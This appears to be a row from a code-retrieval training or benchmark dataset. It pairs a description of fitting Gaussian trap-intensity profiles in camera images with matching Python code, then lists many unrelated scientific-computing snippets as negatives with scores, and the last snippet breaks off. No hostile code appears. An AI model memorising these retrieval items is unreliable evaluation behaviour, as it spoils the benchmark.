query
stringlengths
9
3.4k
document
stringlengths
9
87.4k
metadata
dict
negatives
sequencelengths
4
101
negative_scores
sequencelengths
4
101
document_score
stringlengths
3
10
document_rank
stringclasses
102 values
Scans the given image for the 'ntraps' number of trap intensity peaks. Then extracts the 1dimensional gaussian profiles across the traps and returns a list of the amplitudes.
def guess_image(which_cam, image, ntraps): threshes = [0.5, 0.65] ## Image Conditioning ## margin = 10 threshold = np.max(image)*threshes[which_cam] im = image.transpose() x_len = len(im) peak_locs = np.zeros(x_len) peak_vals = np.zeros(x_len) ## Trap Peak Detection ## for i in range(x_len): if i < margin or x_len - i < margin: peak_locs[i] = 0 peak_vals[i] = 0 else: peak_locs[i] = np.argmax(im[i]) peak_vals[i] = max(im[i]) ## Trap Range Detection ## first = True pos_first, pos_last = 0, 0 left_pos = 0 for i, p in enumerate(peak_vals): if p > threshold: left_pos = i elif p < threshold and left_pos != 0: if first: pos_first = (left_pos + i) // 2 first = False pos_last = (left_pos + i) // 2 left_pos = 0 ## Separation Value ## separation = (pos_last - pos_first) / ntraps # In Pixels ## Initial Guesses ## means0 = np.linspace(pos_first, pos_last, ntraps).tolist() waists0 = (separation * np.ones(ntraps) / 2).tolist() ampls0 = (max(peak_vals) * 0.7 * np.ones(ntraps)).tolist() _params0 = [means0, waists0, ampls0, [0.06]] params0 = [item for sublist in _params0 for item in sublist] xdata = np.arange(x_len) plt.figure() plt.plot(xdata, peak_vals) plt.plot(xdata, wrapper_fit_func(xdata, ntraps, params0), '--r') # Initial Guess plt.xlim((pos_first - margin, pos_last + margin)) plt.legend(["Data", "Guess", "Fit"]) plt.show(block=False)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def analyze_image(which_cam, image, ntraps, iteration=0, verbose=False):\n threshes = [0.5, 0.6]\n margin = 10\n threshold = np.max(image) * threshes[which_cam]\n im = image.transpose()\n\n x_len = len(im)\n peak_locs = np.zeros(x_len)\n peak_vals = np.zeros(x_len)\n\n ## Trap Peak Detection ##\n for i in range(x_len):\n if i < margin or x_len - i < margin:\n peak_locs[i] = 0\n peak_vals[i] = 0\n else:\n peak_locs[i] = np.argmax(im[i])\n peak_vals[i] = max(im[i])\n\n ## Trap Range Detection ##\n first = True\n pos_first, pos_last = 0, 0\n left_pos = 0\n for i, p in enumerate(peak_vals):\n if p > threshold:\n left_pos = i\n elif left_pos != 0:\n if first:\n pos_first = (left_pos + i) // 2\n first = False\n pos_last = (left_pos + i) // 2\n left_pos = 0\n\n ## Separation Value ##\n separation = (pos_last - pos_first) / ntraps # In Pixels\n\n ## Initial Guesses ##\n means0 = np.linspace(pos_first, pos_last, ntraps).tolist()\n waists0 = (separation * np.ones(ntraps) / 2).tolist()\n ampls0 = (max(peak_vals) * 0.7 * np.ones(ntraps)).tolist()\n _params0 = [means0, waists0, ampls0, [0.06]]\n params0 = [item for sublist in _params0 for item in sublist]\n\n ## Fitting ##\n if verbose:\n print(\"Fitting...\")\n xdata = np.arange(x_len)\n popt, pcov = curve_fit(lambda x, *params_0: wrapper_fit_func(x, ntraps, params_0),\n xdata, peak_vals, p0=params0)\n if verbose:\n print(\"Fit!\")\n plt.figure()\n plt.plot(xdata, peak_vals) # Data\n if iteration:\n plt.plot(xdata, wrapper_fit_func(xdata, ntraps, params0), '--r') # Initial Guess\n plt.plot(xdata, wrapper_fit_func(xdata, ntraps, popt)) # Fit\n plt.title(\"Iteration: %d\" % iteration)\n else:\n plt.title(\"Final Product\")\n\n plt.xlim((pos_first - margin, pos_last + margin))\n plt.legend([\"Data\", \"Guess\", \"Fit\"])\n plt.show(block=False)\n print(\"Fig_Newton\")\n trap_powers = np.frombuffer(popt[2 * ntraps:3 * ntraps])\n return trap_powers", "def trapfilt_taps(N, phil, alfa):\n\n\n\n tt = arange(-N/2,N/2 + 1) # Time axis for h(t) \n # ***** Generate impulse response ht here *****\n ht = zeros(len(tt))\n ix = where(tt != 0)[0]\n if alfa != 0:\n ht[ix] = ((sin(2*pi*phil*tt[ix]))/(pi*tt[ix]))*((sin(2*pi*alfa*phil*tt[ix]))/(2*pi*alfa*phil*tt[ix]))\n else:\n ht[ix] = (sin(2*pi*phil*tt[ix]))/(pi*tt[ix])\n ix0 = where(tt == 0)[0]\n ht[ix0] = 2*phil\n ht = ht/sum(power(ht,2))\n\n return ht", "def gaussianFilter(gain,BT,spSym,nTaps):\n\n a = np.sqrt(np.log(2)/2)/BT\n t = np.linspace(-.5*nTaps,.5*nTaps-1,nTaps)/spSym\n\n ft = np.sqrt(np.pi)/a *np.exp(-(np.pi**2*(t)**2)/a**2)\n ft /= np.sum(ft) * gain # normalize filter\n\n return ft", "def gaussian_proba_map(img):\n method = 'cv2.TM_CCOEFF_NORMED'\n sigmas = [41,31,21,11]\n out = np.zeros(img.shape)\n for sigma in sigmas:\n size=3*sigma\n template = gaussian(size,sigma)\n template/=template.max()\n template*=255\n template = template.astype(np.uint8)\n \n img2 = img.copy()\n meth = eval(method)\n # Apply template Matching\n res = cv2.matchTemplate(img2,template,meth)\n res = np.pad(res,size/2,mode='constant')\n to_replace = res>out\n out[to_replace] = res[to_replace]\n return out", "def compute_tap_features(xtaps, ytaps, t, threshold=20):\n import numpy as np\n\n from mhealthx.extractors.tapping import compute_drift, \\\n compute_tap_intervals, compute_intertap_gap\n from mhealthx.extractors.tapping import TapFeatures as T\n from mhealthx.signals import signal_features\n\n if isinstance(xtaps, list):\n xtaps = np.array(xtaps)\n if isinstance(ytaps, list):\n ytaps = np.array(ytaps)\n if isinstance(t, list):\n t = np.array(t)\n\n # Intertap intervals:\n ipress, intervals = compute_tap_intervals(xtaps, t, threshold)\n\n # Filter data:\n t = t[ipress]\n xtaps = xtaps[ipress]\n ytaps = ytaps[ipress]\n\n # Delta between fastest and slowest intertap intervals:\n T.intertap_gap10, T.intertap_gap25, \\\n T.intertap_gap50 = compute_intertap_gap(intervals)\n\n # Left and right taps and drift:\n mean_x = np.mean(xtaps)\n iL = np.where(xtaps < mean_x)\n iR = np.where(xtaps >= mean_x)\n xL = xtaps[iL]\n yL = ytaps[iL]\n xR = xtaps[iR]\n yR = ytaps[iR]\n driftL = compute_drift(xL, yL)\n driftR = compute_drift(xR, yR)\n\n # Number of taps:\n T.num_taps = xtaps.size\n T.num_taps_left = xL.size\n T.num_taps_right = xR.size\n\n # Time:\n T.time_rng = t[-1] - t[0]\n\n # Intertap interval statistics:\n T.intertap_num, T.intertap_min, T.intertap_max, T.intertap_rng, \\\n T.intertap_avg, T.intertap_std, T.intertap_med, T.intertap_mad, \\\n T.intertap_kurt, T.intertap_skew, T.intertap_cvar, T.intertap_lower25, \\\n T.intertap_upper25, T.intertap_inter50, T.intertap_rms, \\\n T.intertap_entropy, T.intertap_tk_energy = signal_features(intervals)\n\n # Tap statistics:\n T.xL_num, T.xL_min, T.xL_max, T.xL_rng, T.xL_avg, T.xL_std, \\\n T.xL_med, T.xL_mad, T.xL_kurt, T.xL_skew, T.xL_cvar, \\\n T.xL_lower25, T.xL_upper25, T.xL_inter50, T.xL_rms, \\\n T.xL_entropy, T.xL_tk_energy = signal_features(xL)\n\n T.xR_num, T.xR_min, T.xR_max, T.xR_rng, T.xR_avg, T.xR_std, \\\n T.xR_med, T.xR_mad, T.xR_kurt, T.xR_skew, T.xR_cvar, \\\n T.xR_lower25, T.xR_upper25, T.xR_inter50, T.xR_rms, \\\n T.xR_entropy, T.xR_tk_energy = signal_features(xR)\n\n # T.yL_num, T.yL_min, T.yL_max, T.yL_rng, T.yL_avg, T.yL_std, \\\n # T.yL_med, T.yL_mad, T.yL_kurt, T.yL_skew, T.yL_cvar, \\\n # T.yL_lower25, T.yL_upper25, T.yL_inter50, T.yL_rms, \\\n # T.yL_entropy, T.yL_tk_energy = signal_features(yL)\n\n # T.yR_num, T.yR_min, T.yR_max, T.yR_rng, T.yR_avg, T.yR_std, \\\n # T.yR_med, T.yR_mad, T.yR_kurt, T.yR_skew, T.yR_cvar, \\\n # T.yR_lower25, T.yR_upper25, T.yR_inter50, T.yR_rms, \\\n # T.yR_entropy, T.yR_tk_energy = signal_features(yR)\n\n # Drift statistics:\n T.driftL_num, T.driftL_min, T.driftL_max, T.driftL_rng, T.driftL_avg, \\\n T.driftL_std, T.driftL_med, T.driftL_mad, T.driftL_kurt, T.driftL_skew, \\\n T.driftL_cvar, T.driftL_lower25, T.driftL_upper25, T.driftL_inter50, \\\n T.driftL_rms, T.driftL_entropy, T.driftL_tk_energy = \\\n signal_features(driftL)\n\n T.driftR_num, T.driftR_min, T.driftR_max, T.driftR_rng, T.driftR_avg, \\\n T.driftR_std, T.driftR_med, T.driftR_mad, T.driftR_kurt, T.driftR_skew, \\\n T.driftR_cvar, T.driftR_lower25, T.driftR_upper25, T.driftR_inter50, \\\n T.driftR_rms, T.driftR_entropy, T.driftR_tk_energy = \\\n signal_features(driftR)\n\n return T", "def extract_features(img, sigmas, n_features): \n dims = img.shape # dimensions of the image\n \n features = np.zeros((dims[0], dims[1], n_features)) # each feature map has the same size as the input image\n \n # the first feature we use is the pixel intensity in the green channel itself\n img_g = img[:,:,1] #I just assume it follows the RGB convention and not GBR or BGR...\n features[:,:,0] = img_g\n features[:,:,1] = np.sum(img,axis=2) \n \n gabors = get_gabors() \n \n # >>> YOUR CODE STARTS HERE <<<\n i = 2\n# for s in sigmas:\n# gfilters = gauss_filter(s)\n# for gf in gfilters:\n# features[:,:,i] = scipy.signal.fftconvolve(img_g, gf, mode='same') ;i+=1\n for s in sigmas:\n gauss = gauss_filter(s)\n for g in gauss:\n features[:,:,i] = scipy.signal.fftconvolve(img_g, g, mode='same') ;i+=1\n \n for gabor in gabors:\n features[:,:,i] = scipy.signal.fftconvolve(img_g, gabor, mode='same') ;i+=1\n \n \n features[:,:,i] = sobel(img_g, axis=0) ;i+=1\n features[:,:,i] = sobel(img_g, axis=1) ;i+=1\n features[:,:,i] = sobel(img_g, axis=0)+sobel(img_g, axis=1) ;i+=1\n features[:,:,i] = feature.canny(img_g, sigma=0.0) ;i+=1\n features[:,:,i] = feature.canny(img_g, sigma=0, low_threshold=13, high_threshold=50);i+=1\n features[:,:,i] = feature.canny(img_g, sigma=1)\n # >>> YOUR CODE ENDS HERE <<< \n \n return features", "def read_amplification(amp_file = 'dist.dat'):\n n_img, amp_img = np.loadtxt(amp_file, usecols=(0, 6), unpack=True)\n\n amp = []\n\n amp_tmp = []\n\n count = 1\n\n for i in range(len(n_img)):\n if count == n_img[i]:\n amp_tmp.append( amp_img[i] )\n else:\n amp.append(amp_tmp)\n\n amp_tmp = []\n\n amp_tmp.append( amp_img[i] )\n\n count = count + 1\n amp.append(amp_tmp)\n\n return amp", "def cs4243_gauss_pyramid(image, n=3):\n kernel = cs4243_gaussian_kernel(7, 1)\n pyramid = []\n ## your code here####\n\n pyramid = [image]\n for i in range(n):\n gpyr_image = cs4243_filter_faster(pyramid[i], kernel)\n gpyr_image = cs4243_downsample(gpyr_image, 2)\n pyramid.append(gpyr_image)\n \n ##\n return pyramid", "def gaussianarray1d(x, x0_vec, wx_vec, A_vec, offset, ntraps):\n array = np.zeros(np.shape(x))\n for k in range(ntraps):\n array = array + gaussian1d(x, x0_vec[k], wx_vec[k], A_vec[k], 0)\n return array + offset", "def get_gaussian_ff_top(self, filenames):\n amber_ffs = []\n for fname in filenames:\n amber_ffs.append(self._get_gaussian_ff_top_single(filename=fname))\n return amber_ffs", "def get_fluxes_within_mask(tpf, aper_mask, gaia_sources):\n assert tpf is not None\n assert aper_mask is not None\n assert gaia_sources is not None\n ra, dec = gaia_sources[[\"ra\", \"dec\"]].values.T\n pix_coords = tpf.wcs.all_world2pix(np.c_[ra, dec], 0)\n contour_points = measure.find_contours(aper_mask, level=0.1)[0]\n isinside = [\n is_point_inside_mask(contour_points, pix) for pix in pix_coords\n ]\n min_gmag = gaia_sources.loc[isinside, \"phot_g_mean_mag\"].min()\n gamma = gaia_sources.loc[isinside, \"phot_g_mean_mag\"].apply(\n lambda x: 10 ** (0.4 * (min_gmag - x))\n )\n return gamma", "def compute_tap_intervals(xtaps, t, threshold=20):\n import numpy as np\n\n if isinstance(xtaps, list):\n xtaps = np.asarray(xtaps)\n if isinstance(t, list):\n t = np.asarray(t)\n\n # Set time points:\n tap_times = t - t[0]\n\n # Calculate x offset:\n xtaps_offset = xtaps - np.mean(xtaps)\n\n # Find left/right finger \"press\" events:\n dx = xtaps_offset[1:] - xtaps_offset[:-1]\n ipress = np.where(np.abs(dx) > threshold)\n\n # Filter data:\n #xtaps = xtaps[ipress]\n tap_times = tap_times[ipress]\n\n # Find press event intervals:\n tap_intervals = tap_times[1:] - tap_times[:-1]\n\n return ipress, tap_intervals", "def smooth_spectra(xarr, farr, sigma=3, nkern=20):\n xkern = np.arange(nkern)\n kern = np.exp(-(xkern - 0.5 * nkern) ** 2 / (sigma) ** 2)\n\n return gaussian_filter1d(farr, sigma)", "def _get_features_from_batch_images(self, img, r, p):\n tmp_feats = []\n for channel in range(4):\n current_img = img[channel, :, :]\n tmp_feats = np.append(tmp_feats, np.histogram(current_img)[0])\n # extract 8*8 patches of 64*64 px and derive 10 bins histogram\n for j in range(r):\n for k in range(r):\n tmp_feats = np.append(\n tmp_feats,\n np.histogram(current_img[j * p:(j + 1) * (p), k *\n p:(k + 1) * p])[0])\n return tmp_feats", "def features_sigma(img,\n sigma,\n intensity=True,\n edges=True,\n texture=True):\n\n features = []\n\n gx,gy = np.meshgrid(np.arange(img.shape[1]), np.arange(img.shape[0]))\n # print(gx.shape)\n #features.append(gx)\n gx = filters.gaussian(gx, sigma)\n gy = filters.gaussian(gy, sigma)\n\n features.append(np.sqrt(gx**2 + gy**2)) #use polar radius of pixel locations as cartesian coordinates\n\n del gx, gy\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Location features extracted using sigma= %f' % (sigma))\n\n img_blur = filters.gaussian(img, sigma)\n\n if intensity:\n features.append(img_blur)\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Intensity features extracted using sigma= %f' % (sigma))\n\n if edges:\n features.append(filters.sobel(img_blur))\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Edge features extracted using sigma= %f' % (sigma))\n\n if texture:\n H_elems = [\n np.gradient(np.gradient(img_blur)[ax0], axis=ax1)\n for ax0, ax1 in itertools.combinations_with_replacement(range(img.ndim), 2)\n ]\n\n eigvals = feature.hessian_matrix_eigvals(H_elems)\n del H_elems\n\n for eigval_mat in eigvals:\n features.append(eigval_mat)\n del eigval_mat\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Texture features extracted using sigma= %f' % (sigma))\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Image features extracted using sigma= %f' % (sigma))\n\n return features", "def repIpdTft(length,gammas,epsilon):\r\n avgRewards = []\r\n for gamma in gammas: \r\n avgRewards.append(np.mean(ipdTft(length,gamma,epsilon)))\r\n return(avgRewards)", "def sample(self, n_samps):\n # print('gauss trying to sample '+str(n_samps)+' from '+str(self.dist))\n # xs = np.array([self.sample_one() for n in range(n_samps)])\n xs = np.array(self.dist.sample(n_samps))\n # print('gauss sampled '+str(n_samps)+' from '+str(self.dist))\n return xs", "def extract_features(\n img,\n n_sigmas,\n multichannel=True,\n intensity=True,\n edges=True,\n texture=True,\n sigma_min=0.5,\n sigma_max=16,\n):\n if multichannel: #img.ndim == 3 and multichannel:\n all_results = (\n extract_features_2d(\n dim,\n img[..., dim],\n n_sigmas,\n intensity=intensity,\n edges=edges,\n texture=texture,\n sigma_min=sigma_min,\n sigma_max=sigma_max,\n )\n for dim in range(img.shape[-1])\n )\n features = list(itertools.chain.from_iterable(all_results))\n else:\n features = extract_features_2d(0,\n img,\n n_sigmas,\n intensity=intensity,\n edges=edges,\n texture=texture,\n sigma_min=sigma_min,\n sigma_max=sigma_max,\n )\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Feature extraction complete')\n\n logging.info('percent RAM usage: %f' % (psutil.virtual_memory()[2]))\n logging.info('Memory mapping features to temporary file')\n\n features = memmap_feats(features)\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('percent RAM usage: %f' % (psutil.virtual_memory()[2]))\n\n return features #np.array(features)", "def t1_hypointensity( x, xsegmentation, xWMProbability, template, templateWMPrior, wmh_thresh=0.1 ):\n mybig = [88,128,128]\n templatesmall = ants.resample_image( template, mybig, use_voxels=True )\n qaff = ants.registration(\n ants.rank_intensity(x),\n ants.rank_intensity(templatesmall), 'SyN',\n syn_sampling=2,\n syn_metric='CC',\n reg_iterations = [25,15,0,0],\n aff_metric='GC', random_seed=1 )\n afftx = qaff['fwdtransforms'][1]\n templateWMPrior2x = ants.apply_transforms( x, templateWMPrior, qaff['fwdtransforms'] )\n cerebrum = ants.threshold_image( xsegmentation, 2, 4 )\n realWM = ants.threshold_image( templateWMPrior2x , 0.1, math.inf )\n inimg = ants.rank_intensity( x )\n parcellateWMdnz = ants.kmeans_segmentation( inimg, 2, realWM, mrf=0.3 )['probabilityimages'][0]\n x2template = ants.apply_transforms( templatesmall, x, afftx, whichtoinvert=[True] )\n parcellateWMdnz2template = ants.apply_transforms( templatesmall,\n cerebrum * parcellateWMdnz, afftx, whichtoinvert=[True] )\n # features = rank+dnz-image, lprob, wprob, wprior at mybig resolution\n f1 = x2template.numpy()\n f2 = parcellateWMdnz2template.numpy()\n f3 = ants.apply_transforms( templatesmall, xWMProbability, afftx, whichtoinvert=[True] ).numpy()\n f4 = ants.apply_transforms( templatesmall, templateWMPrior, qaff['fwdtransforms'][0] ).numpy()\n myfeatures = np.stack( (f1,f2,f3,f4), axis=3 )\n newshape = np.concatenate( [ [1],np.asarray( myfeatures.shape )] )\n myfeatures = myfeatures.reshape( newshape )\n\n inshape = [None,None,None,4]\n wmhunet = antspynet.create_unet_model_3d( inshape,\n number_of_outputs = 1,\n number_of_layers = 4,\n mode = 'sigmoid' )\n\n wmhunet.load_weights( get_data(\"simwmhseg\", target_extension='.h5') )\n\n pp = wmhunet.predict( myfeatures )\n\n limg = ants.from_numpy( tf.squeeze( pp[0] ).numpy( ) )\n limg = ants.copy_image_info( templatesmall, limg )\n lesresam = ants.apply_transforms( x, limg, afftx, whichtoinvert=[False] )\n # lesresam = lesresam * cerebrum\n rnmdl = antspynet.create_resnet_model_3d( inshape,\n number_of_classification_labels = 1,\n layers = (1,2,3),\n residual_block_schedule = (3,4,6,3), squeeze_and_excite = True,\n lowest_resolution = 32, cardinality = 1, mode = \"regression\" )\n rnmdl.load_weights( get_data(\"simwmdisc\", target_extension='.h5' ) )\n qq = rnmdl.predict( myfeatures )\n\n lesresamb = ants.threshold_image( lesresam, wmh_thresh, 1.0 )\n lgo=ants.label_geometry_measures( lesresamb, lesresam )\n wmhsummary = pd.read_csv( get_data(\"wmh_evidence\", target_extension='.csv' ) )\n wmhsummary.at[0,'Value']=lgo.at[0,'VolumeInMillimeters']\n wmhsummary.at[1,'Value']=lgo.at[0,'IntegratedIntensity']\n wmhsummary.at[2,'Value']=float(qq)\n\n return {\n \"wmh_summary\":wmhsummary,\n \"wmh_probability_image\":lesresam,\n \"wmh_evidence_of_existence\":float(qq),\n \"wmh_max_prob\":lesresam.max(),\n \"features\":myfeatures }", "def find_peaks(f_arr, sigma, niter, bsigma=None):\n # set up the variables\n if bsigma is None:\n bsigma = sigma\n\n # determine the background statistics\n back_ave, back_std = find_backstats(f_arr, sigma, niter)\n\n # calculate the differences between the pixels\n dfh = f_arr[1:-1] - f_arr[:-2]\n dfl = f_arr[1:-1] - f_arr[2:]\n\n # find the objects\n mask = (dfh > 0) * (dfl > 0) * \\\n (abs(f_arr[1:-1] - back_ave) > back_std * sigma)\n t = np.where(mask)[0]\n return t + 1", "def calculate_psf_tilts():\n for order in [1, 2]:\n\n # Get the file\n path = 'files/SOSS_PSF_tilt_order{}.npy'.format(order)\n psf_file = resource_filename('awesimsoss', path)\n\n # Dimensions\n subarray = 'SUBSTRIP256'\n X = range(2048)\n Y = range(256)\n\n # Get the wave map\n wave_map = utils.wave_solutions(subarray, order).astype(float)\n\n # Get the y-coordinate of the trace polynomial in this column\n # (center of the trace)\n coeffs = trace_polynomials(subarray=subarray, order=order)\n trace = np.polyval(coeffs, X)\n\n # Interpolate to get the wavelength value at the center\n wave = interp2d(X, Y, wave_map)\n\n # Get the wavelength of the trace center in each column\n trace_wave = []\n for x, y in zip(X, trace):\n trace_wave.append(wave(x, y)[0])\n\n # For each column wavelength (defined by the wavelength at\n # the trace center) define an isowavelength contour\n angles = []\n for n, x in enumerate(X):\n\n w = trace_wave[x]\n\n # Edge cases\n try:\n w0 = trace_wave[x-1]\n except IndexError:\n w0 = 0\n\n try:\n w1 = trace_wave[x+1]\n except IndexError:\n w1 = 10\n\n # Define the width of the wavelength bin as half-way\n # between neighboring points\n dw0 = np.mean([w0, w])\n dw1 = np.mean([w1, w])\n\n # Get the coordinates of all the pixels in that range\n yy, xx = np.where(np.logical_and(wave_map >= dw0, wave_map < dw1))\n\n # Find the angle between the vertical and the tilted wavelength bin\n if len(xx) >= 1:\n angle = get_angle([xx[-1], yy[-1]], [x, trace[x]])\n else:\n angle = 0\n\n # Don't flip them upside down\n angle = angle % 180\n\n # Add to the array\n angles.append(angle)\n\n # Save the file\n np.save(psf_file, np.array(angles))\n print('Angles saved to', psf_file)", "def haperfluxMany(inputlist, maplist, radius, rinner, router, galactic=True, decimal=True, noise_model=0):\n\n ## Names and frequencies of the sample maps included in this repo.\n\n freqlist = ['30','44','70','100','143','217','353','545','857','1249','1874','2141','2998','3331','4612','4997','11992','16655','24983','24983','24983','33310']\n freqval = [28.405889, 44.072241,70.421396,100.,143.,217.,353.,545.,857.,1249.,1874.,2141.,2141.,2998.,2998.,3331.,4612.,4997.,11992.,16655.,24983.,24983.,24983.,33310.]\n band_names = [\"akari9\", \"dirbe12\",\"iras12\",\"wise12\",\"akari18\",\"iras25\",\"iras60\",\"akari65\",\"akari90\",\"dirbe100\",\"iras100\",\"akari140\",\"dirbe140\",\"akari160\",\"dirbe240\",\"planck857\", \"planck545\"]\n\n k0 = 1.0\n k1 = rinner/radius\n k2 = router/radius\n apcor = ((1 - (0.5)**(4*k0**2))-((0.5)**(4*k1**2) - (0.5)**(4*k2**2)))**(-1)\n\n # 'galactic' overrules 'decimal'\n if (galactic==True):\n dt=[('sname',np.dtype('S13')),('glon',np.float32),('glat',np.float32)]\n targets = np.genfromtxt(inputlist, delimiter=\",\",dtype=dt)\n\n ns = len(targets['glat'])\n\n fd3 = -1\n fd_err3 = -1\n\n fn = np.genfromtxt(maplist, delimiter=\" \", dtype='str')\n nmaps = len(fn)\n ## Initialize the arrays which will hold the results\n fd_all = np.zeros((ns,nmaps))\n fd_err_all = np.zeros((ns,nmaps))\n fd_bg_all = np.zeros((ns,nmaps))\n\n # Start the actual processing: Read-in the maps.\n for ct2 in range(0,nmaps):\n xtmp_data, xtmp_head = hp.read_map(fn[ct2], h=True, verbose=False, nest=False)\n freq = dict(xtmp_head)['FREQ']\n units = dict(xtmp_head)['TUNIT1']\n freq_str = str(freq)\n idx = freqlist.index(str(freq))\n currfreq = int(freq)\n\n if (radius == None):\n radval = fwhmlist[idx]\n else:\n radval = radius\n\n\n for ct in range(0,ns):\n\n glon = targets['glon'][ct]\n glat = targets['glat'][ct]\n\n fd_all[ct,ct2], fd_err_all[ct,ct2], fd_bg_all[ct,ct2] = \\\n haperflux(inmap= xtmp_data, freq= currfreq, lon=glon, lat=glat, aper_inner_radius=radius, aper_outer_radius1=rinner, \\\n aper_outer_radius2=router,units=units, noise_model=noise_model)\n\n if (np.isfinite(fd_err_all[ct,ct2]) == False):\n fd_all[ct,ct2] = -1\n fd_err_all[ct,ct2] = -1\n else:\n if radius==None:\n fd_all[ct,ct2] = fd_all[ct,ct2]*apcor\n fd_err_all[ct,ct2] = fd_err_all[ct,ct2]*apcor\n\n return fd_all, fd_err_all, fd_bg_all", "def tapered_spectra(s, tapers, NFFT=None, low_bias=True):\r\n N = s.shape[-1]\r\n # XXX: don't allow NFFT < N -- not every implementation is so restrictive!\r\n if NFFT is None or NFFT < N:\r\n NFFT = N\r\n rest_of_dims = s.shape[:-1]\r\n M = int(np.product(rest_of_dims))\r\n\r\n s = s.reshape(int(np.product(rest_of_dims)), N)\r\n # de-mean this sucker\r\n s = utils.remove_bias(s, axis=-1)\r\n\r\n if not isinstance(tapers, np.ndarray):\r\n # then tapers is (NW, K)\r\n args = (N,) + tuple(tapers)\r\n dpss, eigvals = dpss_windows(*args)\r\n if low_bias:\r\n keepers = (eigvals > 0.9)\r\n dpss = dpss[keepers]\r\n eigvals = eigvals[keepers]\r\n tapers = dpss\r\n else:\r\n eigvals = None\r\n K = tapers.shape[0]\r\n sig_sl = [slice(None)] * len(s.shape)\r\n sig_sl.insert(len(s.shape) - 1, np.newaxis)\r\n\r\n # tapered.shape is (M, Kmax, N)\r\n tapered = s[sig_sl] * tapers\r\n\r\n # compute the y_{i,k}(f) -- full FFT takes ~1.5x longer, but unpacking\r\n # results of real-valued FFT eats up memory\r\n t_spectra = fftpack.fft(tapered, n=NFFT, axis=-1)\r\n t_spectra.shape = rest_of_dims + (K, NFFT)\r\n if eigvals is None:\r\n return t_spectra\r\n return t_spectra, eigvals", "def process_noise(qubit, tstep, noise_samples, sigma_array):\n from scipy.stats import norm\n noise_weights = np.zeros((len(sigma_array), len(noise_samples)))\n average_chi_array = np.zeros((len(sigma_array), 9,9), dtype=complex)\n raw_chi_array = noise_iteration(qubit, tstep, noise_samples)\n for i in range(len(sigma_array)):\n noise_weights[i, :] += norm.pdf(noise_samples, loc=0.0, scale=sigma_array[i])\n average_chi_array[i, :, :] += noise_averaging(noise_samples, noise_weights[i, :], raw_chi_array)\n return average_chi_array, raw_chi_array", "def wrapper_fit_func(x, ntraps, *args):\n a, b, c = list(args[0][:ntraps]), list(args[0][ntraps:2 * ntraps]), list(args[0][2 * ntraps:3 * ntraps])\n offset = args[0][-1]\n return gaussianarray1d(x, a, b, c, offset, ntraps)", "def addNoise_amp(array,counts):\r\n if array.dtype == 'complex' :\r\n arrayout = addNoise(np.real(array),counts) + 1.0J * addNoise(np.imag(array),counts)\r\n else :\r\n if np.float64(counts) == 0.0e0 :\r\n arrayout = np.copy(array)\r\n elif np.float64(counts) < 0.0e0 :\r\n print 'bg.addNoise : warning counts < 0'\r\n else :\r\n arrayout = np.zeros(array.shape)\r\n arrayout = np.square(normalise(array))\r\n arrayout = np.random.poisson(arrayout*np.float64(counts))/np.float64(counts)\r\n arrayout = np.sqrt(arrayout)\r\n tot = np.sum(np.abs(array)**2)\r\n arrayout = normalise(arrayout,tot)\r\n return arrayout", "def single_channel_stacking(tifs):\n template_ID=int(len(tifs)/2)\n \n template_raster=gdal_array.LoadFile(tifs[template_ID-1])\n avg_raster=np.zeros_like(template_raster)\n avg_raster=avg_raster+1\n new_raster=np.copy(template_raster)\n # ones=np.full(template_raster.shape, 1)\n for i, tif in enumerate(tifs, start=1):\n if i==template_ID: \n continue\n \n tif_raster=gdal_array.LoadFile(tif)\n # tif_raster=cut_transformed_array_borders(tif_raster)\n result=ird.similarity(template_raster,tif_raster , numiter=1, order=1)\n img_transformed= ird.transform_img(tif_raster, scale=result['scale'], angle=result['angle'], tvec=result['tvec'], mode='constant', bgval=0, order=2)\n \n img_transformed=cut_transformed_array_borders(img_transformed)\n \n # ones_transformed=ird.transform_img(ones, scale=result['scale'], angle=result['angle'], tvec=result['tvec'], mode='constant', bgval=0, order=1)\n ones_transformed=np.zeros_like(template_raster)\n ones_transformed[np.where(img_transformed>0)]=1\n print(ones_transformed)\n \n print(np.mean(ones_transformed), np.max(ones_transformed), np.min(ones_transformed))\n print(ones_transformed[np.where(ones_transformed>0)])\n print(np.min(ones_transformed[np.where(ones_transformed>0)]))\n print(np.max(ones_transformed[np.where(ones_transformed>0)]))\n\n plt.imshow(ones_transformed)\n plt.show()\n plt.close()\n \n # ones_transformed=cut_transformed_array_borders(ones_transformed)\n \n avg_raster=avg_raster+ones_transformed\n # ird.imshow(template_raster, tif_raster, img_transformed)\n \n new_raster=new_raster+img_transformed\n \n # new_raster=new_raster+template_raster \n # new_raster=new_raster/len(tifs)\n\n gtz=np.where(avg_raster>0)\n \n\n \n\n \n \n plt.imshow(new_raster)\n plt.show()\n plt.close()\n # gdal_array.SaveArray(new_raster, tifs[0][:-4]+\"_not_abvertaghe_stacked_.tiff\")\n new_raster[gtz]=new_raster[gtz]/avg_raster[gtz] \n gdal_array.SaveArray(new_raster, tifs[0][:-4]+\"_stacked_.tiff\")\n plt.imshow(new_raster)\n plt.savefig(\"test.tif\", dpi=800)\n plt.show()\n plt.close()\n\n def discrete_cmap(N, base_cmap=None):\n \"\"\"Create an N-bin discrete colormap from the specified input map\"\"\"\n \n # Note that if base_cmap is a string or None, you can simply do\n # return plt.cm.get_cmap(base_cmap, N)\n # The following works for string, None, or a colormap instance:\n \n base = plt.cm.get_cmap(base_cmap)\n color_list = base(np.linspace(0, 1, N))\n cmap_name = base.name + str(N)\n return base.from_list(cmap_name, color_list, N)\n\n cmap=discrete_cmap(int(avg_raster.max())+1, base_cmap=\"ocean\") \n \n norm=mpl.colors.BoundaryNorm(np.arange(-0.5,int(avg_raster.max()+1)), cmap.N)\n fig=plt.figure()\n fig.set_size_inches(5,4)\n ax=fig.add_subplot(111)\n data=ax.matshow(avg_raster, cmap=cmap, norm=norm)\n fig.colorbar(data, 